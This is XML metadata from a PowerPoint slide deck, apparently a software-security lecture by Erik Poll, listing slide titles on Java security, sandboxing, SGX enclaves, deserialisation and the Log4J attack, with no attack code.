      <vt:lpstr>The security failure of Java (1)  </vt:lpstr>
      <vt:lpstr>The security failure of Java (2)</vt:lpstr>
      <vt:lpstr>Log4J attack</vt:lpstr>
      <vt:lpstr>3. Hardware-based sandboxing - also for unsafe languages</vt:lpstr>
      <vt:lpstr>Sandboxing in unsafe languages</vt:lpstr>
      <vt:lpstr>Example: security-sensitive code in large program </vt:lpstr>
      <vt:lpstr>Isolating security-sensitive code with secure enclaves </vt:lpstr>
      <vt:lpstr>Isolating security-sensitive code with secure enclaves </vt:lpstr>
      <vt:lpstr>Isolating security-sensitive code with secure enclaves </vt:lpstr>
      <vt:lpstr>Secure enclaves</vt:lpstr>
      <vt:lpstr> Enclaves using Intel SGX</vt:lpstr>
      <vt:lpstr>The security failure of SGX  And other secure enclave technologies? </vt:lpstr>
      <vt:lpstr>Execution-aware memory protection</vt:lpstr>
      <vt:lpstr>Spot the defect!</vt:lpstr>
      <vt:lpstr>Different attacker models for software</vt:lpstr>
      <vt:lpstr>Recap: different forms of compartmentalisation</vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>(De)serialisation  </vt:lpstr>
      <vt:lpstr>Deserialisation attacks in Java</vt:lpstr>
      <vt:lpstr>Deserialisation attacks in Java</vt:lpstr>
      <vt:lpstr>Log4J attack</vt:lpstr>
      <vt:lpstr>JNDI (Java Naming and Directory Interface)</vt:lpstr>
      <vt:lpstr>The Log4J attack</vt:lpstr>
      <vt:lpstr>Example data exfiltration using Log4J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Erik Poll</dc:creator>
  <cp:lastModifiedBy>Poll, E. (Erik)</cp:lastModifiedBy>
  <cp:revision>274</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-03-17T10:19:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-08T09:34:50Z</dcterms:modified>
</cp:coreProperties>
</file>